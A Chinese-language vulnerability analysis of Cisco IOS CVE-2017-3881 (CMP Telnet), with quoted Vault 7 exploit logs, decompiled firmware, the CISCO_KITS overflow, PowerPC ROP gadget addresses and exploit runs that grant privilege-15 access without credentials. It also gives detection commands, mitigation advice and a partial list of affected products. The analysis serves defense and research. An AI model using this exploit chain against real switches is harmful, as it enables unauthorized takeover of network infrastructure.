导语:2017年3月17日,思科官方网站发布公告称Cisco IOS&IOS XE Software 集群管理协议(Cluster Management Protocol)存在远程执行代码漏洞(CVE-2017-3881)。
2017年3月17日,思科官方网站发布公告称Cisco IOS&IOS XE Software 集群管理协议(Cluster Management Protocol)存在远程执行代码漏洞(CVE-2017-3881)。
该漏洞是思科在研究CIA泄漏文档“Vault 7”的过程中发现的,攻击者可以在未授权的情况下远程重启受影响的设备或越权执行代码。造成该漏洞的主要原因是由于没有限制CMP-specific Telnet仅可用于内部与本地的集群成员之间的通信,而是可用于连接任何受影响的设备,以及对于变形过的CMP-specific Telnet选项设置的错误处理。当用Telnet连接一个受影响设备的过程中,攻击者可以通过发送一个变异过的CMP-specific Telnet选项设置来建立与该设备的连接,利用此方法攻击者可以远程执行任意代码来完全控制此设备或者使得该设备重启。
截止到发稿时,思科还没有修复集群管理协议中的远程执行代码漏洞CVE-2017-3881。
Vault 7的文档揭示了远程执行代码漏洞的测试过程,该漏洞没有利用源代码而是以交互模式或设置模式启动。交互模式通过telnet发送有效载荷,并在相同的telnet连接的上下文中立即向攻击者提供命令shell:
Started ROCEM interactive session - successful: [email protected]:/home/user1/ops/adverse/adverse-1r/rocem# ./rocem_c3560-ipbase-mz.122-35.SE5.py -i 192.168.0.254 [+] Validating data/interactive.bin [+] Validating data/set.bin [+] Validating data/transfer.bin [+] Validating data/unset.bin **************************************** Image: c3560-ipbase-mz.122-35.SE5 Host: 192.168.0.254 Action: Interactive **************************************** Proceed? (y/n)y Trying 127.0.0.1... [*] Attempting connection to host 192.168.0.254:23 Connected to 127.0.0.1. Escape character is '^]'. [+] Connection established [*] Starting interactive session User Access Verification Password: MLS-Sth# MLS-Sth# show priv Current privilege level is 15 MLS-Sth#show users Line User Host(s) Idle Location * 1 vty 0 idle 00:00:00 192.168.221.40 Interface User Mode Idle Peer Address MLS-Sth#exit Connection closed by foreign host.
利用设置模式,修改开关内存为后续telnet的越权连接做准备:
Test set/unset feature of ROCEM DUT configured with target configuration and network setup DUT is accessed by hopping through three flux nodes as per the CONOP Reloaded DUT to start with a clean device From Adverse ICON machine, set ROCEM: [email protected]:/home/user1/ops/adverse/adverse-1r/rocem# ./rocem_c3560-ipbase-mz.122-35.SE5.py -s 192.168.0.254 [+] Validating data/interactive.bin [+] Validating data/set.bin [+] Validating data/transfer.bin [+] Validating data/unset.bin **************************************** Image: c3560-ipbase-mz.122-35.SE5 Host: 192.168.0.254 Action: Set **************************************** Proceed? (y/n)y [*] Attempting connection to host 192.168.0.254:23 [+] Connection established [*] Sending Protocol Step 1 [*] Sending Protocol Step 2 [+] Done [email protected]:/home/user1/ops/adverse/adverse-1r/rocem# Verified I could telnet and rx priv 15 without creds: [email protected]:/home/user1/ops/adverse/adverse-1r/rocem# telnet 192.168.0.254 Trying 192.168.0.254... Connected to 192.168.0.254. Escape character is '^]'. MLS-Sth# MLS-Sth#show priv Current privilege level is 15 MLS-Sth#
在研究此漏洞时,我们发现了一个对我们有用的信息——telnet调试输出:
14. Confirm Xetron EAR 5355 - Debug telnet causes anomalous output 1.Enabled debug telnet on DUT 2.Set ROCEM 3.Observed the following: 000467: Jun 3 13:54:09.330: TCP2: Telnet received WILL TTY-SPEED (32) (refused) 000468: Jun 3 13:54:09.330: TCP2: Telnet sent DONT TTY-SPEED (32) 000469: Jun 3 13:54:09.330: TCP2: Telnet received WILL LOCAL-FLOW (33) (refused) 000470: Jun 3 13:54:09.330: TCP2: Telnet sent DONT LOCAL-FLOW (33) 000471: Jun 3 13:54:09.330: TCP2: Telnet received WILL LINEMODE (34) 000472: Jun 3 13:54:09.330: TCP2: Telnet sent DONT LINEMODE (34) (unimplemented) 000473: Jun 3 13:54:09.330: TCP2: Telnet received WILL NEW-ENVIRON (39) 000474: Jun 3 13:54:09.330: TCP2: Telnet sent DONT NEW-ENVIRON (39) (unimplemented) 000475: Jun 3 13:54:09.330: TCP2: Telnet received DO STATUS (5) 000476: Jun 3 13:54:09.330: TCP2: Telnet sent WONT STATUS (5) (unimplemented) 000477: Jun 3 13:54:09.330: TCP2: Telnet received WILL X-DISPLAY (35) (refused) 000478: Jun 3 13:54:09.330: TCP2: Telnet sent DONT X-DISPLAY (35) 000479: Jun 3 13:54:09.330: TCP2: Telnet received DO ECHO (1) 000480: Jun 3 13:54:09.330: Telnet2: recv SB NAWS 116 29 000481: Jun 3 13:54:09.623: Telnet2: recv SB 36 92 OS^K'zAuk,Fz90X 000482: Jun 3 13:54:09.623: Telnet2: recv SB 36 0 ^CCISCO_KITS^Ap
注意最后一行接收到的CISCO_KITS的选项,时候证明这是一个重要的字符串。
根据思科目前的公布的情况,总共有318款产品受此漏洞影响,详细产品列表请见附录,
目前以下只有两种产品不受此漏洞的影响:
1.运行Cisco IOS Software 但是没有在上述受影响列表内的设备不受影响。
2.运行Cisco IOS XE Software但是不包含CMP协议子系统的产品不受影响。
CVE-2017-3881的检测方法
运行Cisco IOS 与IOS XE 软件的设备均需要确认Telnet的设置选项是否为接受任何连接请求。运行Cisco IOS XE软件的设备还需要额外确认软件镜像中是否存在CMP子系统。
对于运行Cisco IOS XE软件的设备,要确认软件镜像下是否存在CMP子系统,可以在该设备的CLI下输入以下命令:
show subsys class protocol | include ^cmp
下面的例子为软件镜像中存在CMP子系统的结果:
下面的例子为软件镜像中不存在CMP子系统的结果:
要确认设备是否配置为接受任何Telnet连接请求,可以在该设备的CLI下输入以下命令:
show running-config | include ^line vty|transport input
运行此命令可得到多种结果,比如:
1.在line vty配置行后缺少transport input配置行说明该设备在处理来自虚拟终端(VTY)的链接访问时采用的是一系列默认协议,这些协议包扩Telnet的协议,该设备将接受任何来自VTY的Telnet连接请求,因此这是一个受该漏洞影响的配置:
2.设备被特地配置为在处理部分可用VTY的连接请求时仅接受SSH协议,然而编号为6-15的VTY仍然使用默认协议。该设备在处理这些特定的VTY连接请求时仍然会接受任何Telnet请求,因此这是一个受漏洞影响的配置:
3.在处理与所有VTY的连接时,使用任何可用的协议。Telnet协议也会被使用,因此这是一个受漏洞影响的配置:
4.对于所有的VTY连接请求,仅允许使用SSH协议。任何使用Telnet的VTY连接均不会通过,因此这不是一个受漏洞影响的配置:
5.对于来自VTY的连接请求,Telnet和SSH协议均被允许。利用Telnet连接该设备的请求均会通过,因此这是一个受漏洞影响的配置:
要查询Cisco IOS Software的版本信息,管理员可以登录到设备,在CLI下使用show version命令来查看系统相关信息。如果该设备在运行Cisco IOS Software,系统信息会有类似于Cisco Internetwork Operating System Software or Cisco IOS Software条目的出现。要查询Cisco IOS XE Software的版本信息,可以同样在CLI下使用show version命令来查询,如果该设备在运行Cisco IOS XE Software,会有类似于Cisco IOS XE Software的条目出现。
CVE-2017-3881的运行原理分析
集群管理的切换
假设,我们现在有两个Catalyst 2960交换机,这两个集群设置交换机之间是主从切换关系。主交换机能够在从站上获得特权命令shell,正像上面提到的那样,telnet被用作集群成员之间的命令协议。
现在来查找它们之间的集群通信,以下这些应该都能在主交换机配置中找到:
cluster enable CLGRP 0 cluster member 1 mac-address xxxx.xxxx.xxxx
这就会将附近的交换机作为集群从站添加进来。 rcommand <num>允许从主接口的从设备上获取接口命令:
catalyst1>rcommand 1 catalyst2>who Line User Host(s) Idle Location * 1 vty 0 idle 00:00:00 10.10.10.10 Interface User Mode Idle Peer Address
我们来看看rcommand生成的命令:
这看起来更像telnet的连接请求,集群管理协议在内部使用Telnet作为集群成员之间的信令和命令协议。
好的,运行show version可以看到更多的连接协议:
catalyst2>show version Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE1, RELEASE SOFTWARE (fc1)
Telnet协议实际上被封装在第2层LLC数据包中,我们将在源地址和目的地址字段中注意到一些零散的MAC地址内的IP数据包。在这些IP数据包之内,存有具有telnet会话的TCP协议:
telnet会话通常在telnet选项协商之前,其中就包括终端窗口的大小,终端类型等。
我们可以看到一个telnet选项被转移到服务器端:
如上图所示,我们可以看到从主交换机发送到从站的telnet选项“CISCO_KITS”。在执行利用期间,CIA泄漏的Vault 7文档中也存在相同的字符串。
固件的分析
固件位于交换机上的flash:<version>.bin:
catalyst2#dir flash: Directory of flash:/ 2 -rwx 9771282 Mar 1 1993 00:13:28 +00:00 c2960-lanbasek9-mz.122-55.SE1.bin 3 -rwx 2487 Mar 1 1993 00:01:53 +00:00 config.text
内置的ftp客户端允许将此固件传输到任意ftp服务器,我们现在用二进制文件来分析和提取文件的内容:
$ binwalk -e c2960-lanbasek9-mz.122-55.SE1.bin DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 112 0x70 bzip2 compressed data, block size = 900k
为了方便对所得到的二进制数进行静态分析,我们可以先了解一下固件负载偏移量。在引导过程中,该偏移量将体现在串行控制台:
Loading "flash:c2960-lanbasek9-mz.122-55.SE1.bin"[email protected]@@@@@@@@@@@@@@@@@@@@@ File "flash:c2960-lanbasek9-mz.122-55.SE1.bin" uncompressed and installed, entry point: 0x3000 executing...
CPU架构是PowerPC 32位BigEndian,将二进制文件加载到0x3000:
字符串的发现
在了解了IDA中的大部分功能后,我们可以看到固件末尾的字符串的交叉错误:
“CISCO_KITS”字符串由return_cisco_kits函数引用,该函数只将该字符串返回为char *。我们将重点关注调用return_cisco_kits的call_cisco_kits函数0x0004ED8C:
因为telnet代码对于客户端和服务器而言是对称的,我们实际上可以看到发送到服务器端的缓冲区的格式 – %c%s%c%d:%s:%d :,这实际上与发送缓冲区为 x03CISCO_KITS x012 :: 1的观察到的请求命令是一致的:
if ( telnet_struct->is_client_mode ) // client mode? then send "CISCO_KITS" string{ if ( telnet_struct->is_client_mode == 1 ) { cisco_kits_string_2 = (char *)return_cisco_kits(); int_two = return_2(); tty_str = get_from_tty_struct((telnet_struct *)telnet_struct_arg->tty_struct); *(_DWORD *)&telnet_struct_arg->tty_struct[1].field_6D1; format1_ret = format_1( 128, (int)&str_buf[8], "%c%s%c%d:%s:%d:", 3, cisco_kits_string_2, 1, int_two, tty_str, 0); telnet_struct = (telnet_struct *)telnet_send_sb( (int)telnet_struct_arg, 36, 0, &str_buf[8], format1_ret, v8, v7, v6); }}
注意事项有两个%s字符串修饰符,但是在CISCO_KITS的协议样本中只有一个字符串实际存在,第二个字符串是空的,并且被限制在两个字符之间。通过进一步观察相同功能的控制流程,我们注意到处理第二个字符串时所发生的过程:
for ( j = (unsigned __int8)*string_buffer; j != ':'; j = (unsigned __int8)*string_buffer )// put data before second ":" at &str_buf + 152{ str_buf[v19++ + 152] = j; ++string_buffer;}
我们在第二个%s字符串中发送的数据实际上被复制到了:char,而会不检查目标缓冲区驻留在堆栈上的目标边界,这会造成缓冲区溢出:
获取代码执行权限
获取指令指针的控制很容易,因为指令指针已被我们发送的缓冲区给覆盖了。但问题是驻留在内存中的栈和堆是不可执行的,这实际上是启用数据和指令缓存的效果:
由于没有办法在堆栈上执行代码,所以我们不得不将其用作数据缓冲区并重新使用固件中的现有代码。链接函数epilogs来执行任意的内存写入,看看0x00F47A34的反编译函数:
if ( ptr_is_cluster_mode(tty_struct_var->telnet_struct_field) ){ telnet_struct_var = tty_struct_var->telnet_struct_field; ptr_get_privilege_level = (int (__fastcall *)(int))some_libc_func(0, (unsigned int *)&dword_22659D4[101483]); privilege_level = ptr_get_privilege_level(telnet_struct_var);// equals to 1 during rcommand 1 telnet_struct_1 = tty_struct_var->telnet_struct_field; ptr_telnet_related2 = (void (__fastcall *)(int))some_libc_func(1u, (unsigned int *)&dword_22659D4[101487]); ptr_telnet_related2(telnet_struct_1); *(_DWORD *)&tty_struct_var->privilege_level_field = ((privilege_level << 28) & 0xF0000000 | *(_DWORD *)&tty_struct_var->privilege_level_field & 0xFFFFFFF) & 0xFF7FFFFF;}else{ //generic telnet session}
首先要强调的是,通过引用全局变量间接地对ptr_is_cluster_mode和ptr_get_privilege_level进行调用,检查地址0x00F47B60的行,is_cluster_mode函数地址正在从0x01F24A7的dword加载。同样,get_privilege_level的地址正在从0x3F47B8C的r3寄存器加载。此时,r3会是0x022659D4 + 0x28 + 0xC处的一个已经解除引用的指针:
如果ptr_is_cluster_mode调用返回值为非0 ,并且ptr_get_privilege调用返回值不在-1位置,那我们在不需要提供任何凭据的情况下,就可以得到一个telnet shell。下面的代码用来就是来检查变量privilege_level的值,以进一步减少代码:
如果我们可以将这些函数指针覆盖到总是返回所需的正值,那该多好,由于堆和栈无法直接执行代码,所以我们不得不重用现有的代码来执行这样的内存写入,使用以下ROPGadget:
0x000037b4: lwz r0, 0x14(r1) mtlr r0 lwz r30, 8(r1) lwz r31, 0xc(r1) addi r1, r1, 0x10 blr
将is_cluster_mode函数指针加载到r30中,加载该值将该指针重写为r31。覆盖的值就是始终返回1的函数的地址:
0x00dffbe8: stw r31, 0x34(r30) lwz r0, 0x14(r1) mtlr r0 lmw r30, 8(r1) addi r1, r1, 0x10 blr
执行代码写入:
0x0006788c: lwz r9, 8(r1) lwz r3, 0x2c(r9) lwz r0, 0x14(r1) mtlr r0 addi r1, r1, 0x10 blr
0x006ba128: lwz r31, 8(r1) lwz r30, 0xc(r1) addi r1, r1, 0x10 lwz r0, 4(r1) mtlr r0 blr
前两个ROPGadget会将一个get_privilege_level函数的指针加载到r3中,并将该值覆盖到r31中。目标值是一个返回15的函数:
0x0148e560: stw r31, 0(r3) lwz r0, 0x14(r1) mtlr r0 lwz r31, 0xc(r1) addi r1, r1, 0x10 blr
这个epilog会完成最终写入并返回到合法的执行流程,当然,,应该对堆栈结构进行相应的格式化,以使这个rop链可以正常工作。
运行漏洞利用代码
现在我们终于有了一个给一些重要函数指针打补丁的工具了,这些函数主要负责处理连接和权限级别。请注意,漏洞利用代码严重依赖于交换机上所使用的固件版本,对某些不同的固件版本来说,这里的漏洞利用代码很可能会导致设备崩溃。
根据我们对固件SE1的静态和动态分析的了解,由于这个版本过于老旧,我们建议还是在固件12.2(55)SE11上来构建了一个漏洞利用代码。这些不同版本之间的区别久在于函数和指针偏移的不同。此外,该漏洞利用代码运行机制使得我们可以轻松地将更改过的设置进行还原:
$ python c2960-lanbasek9-m-12.2.55.se11.py 192.168.88.10 --set [+] Connection OK [+] Recieved bytes from telnet service: 'xffxfbx01xffxfbx03xffxfdx18xffxfdx1f' [+] Sending cluster option [+] Setting credless privilege 15 authentication [+] All done $ telnet 192.168.88.10 Trying 192.168.88.10... Connected to 192.168.88.10. Escape character is '^]'. catalyst1#show priv Current privilege level is 15 catalyst1#show ver Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE11, RELEASE SOFTWARE (fc3) ... System image file is "flash:c2960-lanbasek9-mz.122-55.SE11.bin" ... cisco WS-C2960-48TT-L (PowerPC405) processor (revision B0) with 65536K bytes of memory. ... Model number : WS-C2960-48TT-L ... Switch Ports Model SW Version SW Image ------ ----- ----- ---------- ---------- * 1 50 WS-C2960-48TT-L 12.2(55)SE11 C2960-LANBASEK9-M Configuration register is 0xF
进行还原:
$ python c2960-lanbasek9-m-12.2.55.se11.py 192.168.88.10 --unset [+] Connection OK [+] Recieved bytes from telnet service: 'xffxfbx01xffxfbx03xffxfdx18xffxfdx1frncatalyst1#' [+] Sending cluster option [+] Unsetting credless privilege 15 authentication [+] All done $ telnet 192.168.88.10 Escape character is '^]'. User Access Verification Password:
这个远程执行代码漏洞的POC能使用于以上这个固件版本,另外这个漏洞利用代码的DoS版本可作为metasploit模块使用,也适用于思科318款受此漏洞影响的产品。
对CVE-2017-3881漏洞的防护
禁用Telnet的建议:
思科官方建议禁用Telnet协议而采用SSH协议来处理连接请求。具体的操作方法见如下链接:
http://www.cisco.com/c/en/us/support/docs/ip/access-lists/13608-21.html
不禁用Telnet的建议:
这些用户可以创建设备层次的VTY访问白名单或者基础设施访问控制名单(iACLs)。具体操作方法可参考如下链接:
http://www.cisco.com/c/en/us/support/docs/ip/access-lists/13608-21.html#anc41
http://www.cisco.com/c/en/us/support/docs/ip/access-lists/43920-iacl.html
用户可以利用思科官方的检测工具来检测,地址如下:
http://tools.cisco.com/security/center/selectIOSVersion.x
附录
受影响的318款产品如下:
Cisco Catalyst 2350-48TD-S Switch Cisco Catalyst 2350-48TD-SD Switch Cisco Catalyst 2360-48TD-S Switch Cisco Catalyst 2918-24TC-C Switch Cisco Catalyst 2918-24TT-C Switch Cisco Catalyst 2918-48TC-C Switch Cisco Catalyst 2918-48TT-C Switch Cisco Catalyst 2928-24TC-C Switch Cisco Catalyst 2960-24-S Switch Cisco Catalyst 2960-24LC-S Switch Cisco Catalyst 2960-24LT-L Switch Cisco Catalyst 2960-24PC-L Switch Cisco Catalyst 2960-24PC-S Switch Cisco Catalyst 2960-24TC-L Switch Cisco Catalyst 2960-24TC-S Switch Cisco Catalyst 2960-24TT-L Switch Cisco Catalyst 2960-48PST-L Switch Cisco Catalyst 2960-48PST-S Switch Cisco Catalyst 2960-48TC-L Switch Cisco Catalyst 2960-48TC-S Switch Cisco Catalyst 2960-48TT-L Switch Cisco Catalyst 2960-48TT-S Switch Cisco Catalyst 2960-8TC-L Compact Switch Cisco Catalyst 2960-8TC-S Compact Switch Cisco Catalyst 2960-Plus 24LC-L Switch Cisco Catalyst 2960-Plus 24LC-S Switch Cisco Catalyst 2960-Plus 24PC-L Switch Cisco Catalyst 2960-Plus 24PC-S Switch Cisco Catalyst 2960-Plus 24TC-L Switch Cisco Catalyst 2960-Plus 24TC-S Switch Cisco Catalyst 2960-Plus 48PST-L Switch Cisco Catalyst 2960-Plus 48PST-S Switch Cisco Catalyst 2960-Plus 48TC-L Switch Cisco Catalyst 2960-Plus 48TC-S Switch Cisco Catalyst 2960C-12PC-L Switch Cisco Catalyst 2960C-8PC-L Switch Cisco Catalyst 2960C-8TC-L Switch Cisco Catalyst 2960C-8TC-S Switch Cisco Catalyst 2960CG-8TC-L Compact Switch Cisco Catalyst 2960CPD-8PT-L Switch Cisco Catalyst 2960CPD-8TT-L Switch Cisco Catalyst 2960CX-8PC-L Switch Cisco Catalyst 2960CX-8TC-L Switch Cisco Catalyst 2960G-24TC-L Switch Cisco Catalyst 2960G-48TC-L Switch Cisco Catalyst 2960G-8TC-L Compact Switch Cisco Catalyst 2960L-16PS-LL Switch Cisco Catalyst 2960L-16TS-LL Switch Cisco Catalyst 2960L-24PS-LL Switch Cisco Catalyst 2960L-24TS-LL Switch Cisco Catalyst 2960L-48PS-LL Switch Cisco Catalyst 2960L-48TS-LL Switch Cisco Catalyst 2960L-8PS-LL Switch Cisco Catalyst 2960L-8TS-LL Switch Cisco Catalyst 2960PD-8TT-L Compact Switch Cisco Catalyst 2960S-24PD-L Switch Cisco Catalyst 2960S-24PS-L Switch Cisco Catalyst 2960S-24TD-L Switch Cisco Catalyst 2960S-24TS-L Switch Cisco Catalyst 2960S-24TS-S Switch Cisco Catalyst 2960S-48FPD-L Switch Cisco Catalyst 2960S-48FPS-L Switch Cisco Catalyst 2960S-48LPD-L Switch Cisco Catalyst 2960S-48LPS-L Switch Cisco Catalyst 2960S-48TD-L Switch Cisco Catalyst 2960S-48TS-L Switch Cisco Catalyst 2960S-48TS-S Switch Cisco Catalyst 2960S-F24PS-L Switch Cisco Catalyst 2960S-F24TS-L Switch Cisco Catalyst 2960S-F24TS-S Switch Cisco Catalyst 2960S-F48FPS-L Switch Cisco Catalyst 2960S-F48LPS-L Switch Cisco Catalyst 2960S-F48TS-L Switch Cisco Catalyst 2960S-F48TS-S Switch Cisco Catalyst 2960X-24PD-L Switch Cisco Catalyst 2960X-24PS-L Switch Cisco Catalyst 2960X-24PSQ-L Cool Switch Cisco Catalyst 2960X-24TD-L Switch Cisco Catalyst 2960X-24TS-L Switch Cisco Catalyst 2960X-24TS-LL Switch Cisco Catalyst 2960X-48FPD-L Switch Cisco Catalyst 2960X-48FPS-L Switch Cisco Catalyst 2960X-48LPD-L Switch Cisco Catalyst 2960X-48LPS-L Switch Cisco Catalyst 2960X-48TD-L Switch Cisco Catalyst 2960X-48TS-L Switch Cisco Catalyst 2960X-48TS-LL Switch Cisco Catalyst 2960XR-24PD-I Switch Cisco Catalyst 2960XR-24PD-L Switch Cisco Catalyst 2960XR-24PS-I Switch Cisco Catalyst 2960XR-24PS-L Switch Cisco Catalyst 2960XR-24TD-I Switch Cisco Catalyst 2960XR-24TD-L Switch Cisco Catalyst 2960XR-24TS-I Switch Cisco Catalyst 2960XR-24TS-L Switch Cisco Catalyst 2960XR-48FPD-I Switch Cisco Catalyst 2960XR-48FPD-L Switch Cisco Catalyst 2960XR-48FPS-I Switch Cisco Catalyst 2960XR-48FPS-L Switch Cisco Catalyst 2960XR-48LPD-I Switch Cisco Catalyst 2960XR-48LPD-L Switch Cisco Catalyst 2960XR-48LPS-I Switch Cisco Catalyst 2960XR-48LPS-L Switch Cisco Catalyst 2960XR-48TD-I Switch Cisco Catalyst 2960XR-48TD-L Switch Cisco Catalyst 2960XR-48TS-I Switch Cisco Catalyst 2960XR-48TS-L Switch Cisco Catalyst 2970G-24T Switch Cisco Catalyst 2970G-24TS Switch Cisco Catalyst 2975 Switch Cisco Catalyst 3550 12G Switch Cisco Catalyst 3550 12T Switch Cisco Catalyst 3550 24 DC SMI Switch Cisco Catalyst 3550 24 EMI Switch Cisco Catalyst 3550 24 FX SMI Switch Cisco Catalyst 3550 24 PWR Switch Cisco Catalyst 3550 24 SMI Switch Cisco Catalyst 3550 48 EMI Switch Cisco Catalyst 3550 48 SMI Switch Cisco Catalyst 3560-12PC-S Compact Switch Cisco Catalyst 3560-24PS Switch Cisco Catalyst 3560-24TS Switch Cisco Catalyst 3560-48PS Switch Cisco Catalyst 3560-48TS Switch Cisco Catalyst 3560-8PC Compact Switch Cisco Catalyst 3560C-12PC-S Switch Cisco Catalyst 3560C-8PC-S Switch Cisco Catalyst 3560CG-8PC-S Compact Switch Cisco Catalyst 3560CG-8TC-S Compact Switch Cisco Catalyst 3560CPD-8PT-S Compact Switch Cisco Catalyst 3560CX-12PC-S Switch Cisco Catalyst 3560CX-12PD-S Switch Cisco Catalyst 3560CX-12TC-S Switch Cisco Catalyst 3560CX-8PC-S Switch Cisco Catalyst 3560CX-8PT-S Switch Cisco Catalyst 3560CX-8TC-S Switch Cisco Catalyst 3560CX-8XPD-S Switch Cisco Catalyst 3560E-12D-E Switch Cisco Catalyst 3560E-12D-S Switch Cisco Catalyst 3560E-12SD-E Switch Cisco Catalyst 3560E-12SD-S Switch Cisco Catalyst 3560E-24PD-E Switch Cisco Catalyst 3560E-24PD-S Switch Cisco Catalyst 3560E-24TD-E Switch Cisco Catalyst 3560E-24TD-S Switch Cisco Catalyst 3560E-48PD-E Switch Cisco Catalyst 3560E-48PD-EF Switch Cisco Catalyst 3560E-48PD-S Switch Cisco Catalyst 3560E-48PD-SF Switch Cisco Catalyst 3560E-48TD-E Switch Cisco Catalyst 3560E-48TD-S Switch Cisco Catalyst 3560G-24PS Switch Cisco Catalyst 3560G-24TS Switch Cisco Catalyst 3560G-48PS Switch Cisco Catalyst 3560G-48TS Switch Cisco Catalyst 3560V2-24DC Switch Cisco Catalyst 3560V2-24PS Switch Cisco Catalyst 3560V2-24TS Switch Cisco Catalyst 3560V2-48PS Switch Cisco Catalyst 3560V2-48TS Switch Cisco Catalyst 3560X-24P-E Switch Cisco Catalyst 3560X-24P-L Switch Cisco Catalyst 3560X-24P-S Switch Cisco Catalyst 3560X-24T-E Switch Cisco Catalyst 3560X-24T-L Switch Cisco Catalyst 3560X-24T-S Switch Cisco Catalyst 3560X-24U-E Switch Cisco Catalyst 3560X-24U-L Switch Cisco Catalyst 3560X-24U-S Switch Cisco Catalyst 3560X-48P-E Switch Cisco Catalyst 3560X-48P-L Switch Cisco Catalyst 3560X-48P-S Switch Cisco Catalyst 3560X-48PF-E Switch Cisco Catalyst 3560X-48PF-L Switch Cisco Catalyst 3560X-48PF-S Switch Cisco Catalyst 3560X-48T-E Switch Cisco Catalyst 3560X-48T-L Switch Cisco Catalyst 3560X-48T-S Switch Cisco Catalyst 3560X-48U-E Switch Cisco Catalyst 3560X-48U-L Switch Cisco Catalyst 3560X-48U-S Switch Cisco Catalyst 3750 Metro 24-AC Switch Cisco Catalyst 3750 Metro 24-DC Switch Cisco Catalyst 3750-24FS Switch Cisco Catalyst 3750-24PS Switch Cisco Catalyst 3750-24TS Switch Cisco Catalyst 3750-48PS Switch Cisco Catalyst 3750-48TS Switch Cisco Catalyst 3750E-24PD-E Switch Cisco Catalyst 3750E-24PD-S Switch Cisco Catalyst 3750E-24TD-E Switch Cisco Catalyst 3750E-24TD-S Switch Cisco Catalyst 3750E-48PD-E Switch Cisco Catalyst 3750E-48PD-EF Switch Cisco Catalyst 3750E-48PD-S Switch Cisco Catalyst 3750E-48PD-SF Switch Cisco Catalyst 3750E-48TD-E Switch Cisco Catalyst 3750E-48TD-S Switch Cisco Catalyst 3750G-12S Switch Cisco Catalyst 3750G-12S-SD Switch Cisco Catalyst 3750G-16TD Switch Cisco Catalyst 3750G-24PS Switch Cisco Catalyst 3750G-24T Switch Cisco Catalyst 3750G-24TS Switch Cisco Catalyst 3750G-24TS-1U Switch Cisco Catalyst 3750G-48PS Switch Cisco Catalyst 3750G-48TS Switch Cisco Catalyst 3750V2-24FS Switch Cisco Catalyst 3750V2-24PS Switch Cisco Catalyst 3750V2-24TS Switch Cisco Catalyst 3750V2-48PS Switch Cisco Catalyst 3750V2-48TS Switch Cisco Catalyst 3750X-12S-E Switch Cisco Catalyst 3750X-12S-S Switch Cisco Catalyst 3750X-24P-E Switch Cisco Catalyst 3750X-24P-L Switch Cisco Catalyst 3750X-24P-S Switch Cisco Catalyst 3750X-24S-E Switch Cisco Catalyst 3750X-24S-S Switch Cisco Catalyst 3750X-24T-E Switch Cisco Catalyst 3750X-24T-L Switch Cisco Catalyst 3750X-24T-S Switch Cisco Catalyst 3750X-24U-E Switch Cisco Catalyst 3750X-24U-L Switch Cisco Catalyst 3750X-24U-S Switch Cisco Catalyst 3750X-48P-E Switch Cisco Catalyst 3750X-48P-L Switch Cisco Catalyst 3750X-48P-S Switch Cisco Catalyst 3750X-48PF-E Switch Cisco Catalyst 3750X-48PF-L Switch Cisco Catalyst 3750X-48PF-S Switch Cisco Catalyst 3750X-48T-E Switch Cisco Catalyst 3750X-48T-L Switch Cisco Catalyst 3750X-48T-S Switch Cisco Catalyst 3750X-48U-E Switch Cisco Catalyst 3750X-48U-L Switch Cisco Catalyst 3750X-48U-S Switch Cisco Catalyst 4000 Supervisor Engine I Cisco Catalyst 4000/4500 Supervisor Engine IV Cisco Catalyst 4000/4500 Supervisor Engine V Cisco Catalyst 4500 Series Supervisor Engine II-Plus Cisco Catalyst 4500 Series Supervisor Engine II-Plus-TS Cisco Catalyst 4500 Series Supervisor Engine V-10GE Cisco Catalyst 4500 Series Supervisor II-Plus-10GE Cisco Catalyst 4500 Supervisor Engine 6-E Cisco Catalyst 4500 Supervisor Engine 6L-E Cisco Catalyst 4900M Switch Cisco Catalyst 4928 10 Gigabit Ethernet Switch Cisco Catalyst 4948 10 Gigabit Ethernet Switch Cisco Catalyst 4948 Switch Cisco Catalyst 4948E Ethernet Switch Cisco Catalyst 4948E-F Ethernet Switch Cisco Catalyst Blade Switch 3020 for HP Cisco Catalyst Blade Switch 3030 for Dell Cisco Catalyst Blade Switch 3032 for Dell M1000E Cisco Catalyst Blade Switch 3040 for FSC Cisco Catalyst Blade Switch 3120 for HP Cisco Catalyst Blade Switch 3120X for HP Cisco Catalyst Blade Switch 3130 for Dell M1000E Cisco Catalyst C2928-24LT-C Switch Cisco Catalyst C2928-48TC-C Switch Cisco Catalyst Switch Module 3012 for IBM BladeCenter Cisco Catalyst Switch Module 3110 for IBM BladeCenter Cisco Catalyst Switch Module 3110X for IBM BladeCenter Cisco Embedded Service 2020 24TC CON B Switch Cisco Embedded Service 2020 24TC CON Switch Cisco Embedded Service 2020 24TC NCP B Switch Cisco Embedded Service 2020 24TC NCP Switch Cisco Embedded Service 2020 CON B Switch Cisco Embedded Service 2020 CON Switch Cisco Embedded Service 2020 NCP B Switch Cisco Embedded Service 2020 NCP Switch Cisco Enhanced Layer 2 EtherSwitch Service Module Cisco Enhanced Layer 2/3 EtherSwitch Service Module Cisco Gigabit Ethernet Switch Module (CGESM) for HP Cisco IE 2000-16PTC-G Industrial Ethernet Switch Cisco IE 2000-16T67 Industrial Ethernet Switch Cisco IE 2000-16T67P Industrial Ethernet Switch Cisco IE 2000-16TC Industrial Ethernet Switch Cisco IE 2000-16TC-G Industrial Ethernet Switch Cisco IE 2000-16TC-G-E Industrial Ethernet Switch Cisco IE 2000-16TC-G-N Industrial Ethernet Switch Cisco IE 2000-16TC-G-X Industrial Ethernet Switch Cisco IE 2000-24T67 Industrial Ethernet Switch Cisco IE 2000-4S-TS-G Industrial Ethernet Switch Cisco IE 2000-4T Industrial Ethernet Switch Cisco IE 2000-4T-G Industrial Ethernet Switch Cisco IE 2000-4TS Industrial Ethernet Switch Cisco IE 2000-4TS-G Industrial Ethernet Switch Cisco IE 2000-8T67 Industrial Ethernet Switch Cisco IE 2000-8T67P Industrial Ethernet Switch Cisco IE 2000-8TC Industrial Ethernet Switch Cisco IE 2000-8TC-G Industrial Ethernet Switch Cisco IE 2000-8TC-G-E Industrial Ethernet Switch Cisco IE 2000-8TC-G-N Industrial Ethernet Switch Cisco IE 3000-4TC Industrial Ethernet Switch Cisco IE 3000-8TC Industrial Ethernet Switch Cisco IE-3010-16S-8PC Industrial Ethernet Switch Cisco IE-3010-24TC Industrial Ethernet Switch Cisco IE-4000-16GT4G-E Industrial Ethernet Switch Cisco IE-4000-16T4G-E Industrial Ethernet Switch Cisco IE-4000-4GC4GP4G-E Industrial Ethernet Switch Cisco IE-4000-4GS8GP4G-E Industrial Ethernet Switch Cisco 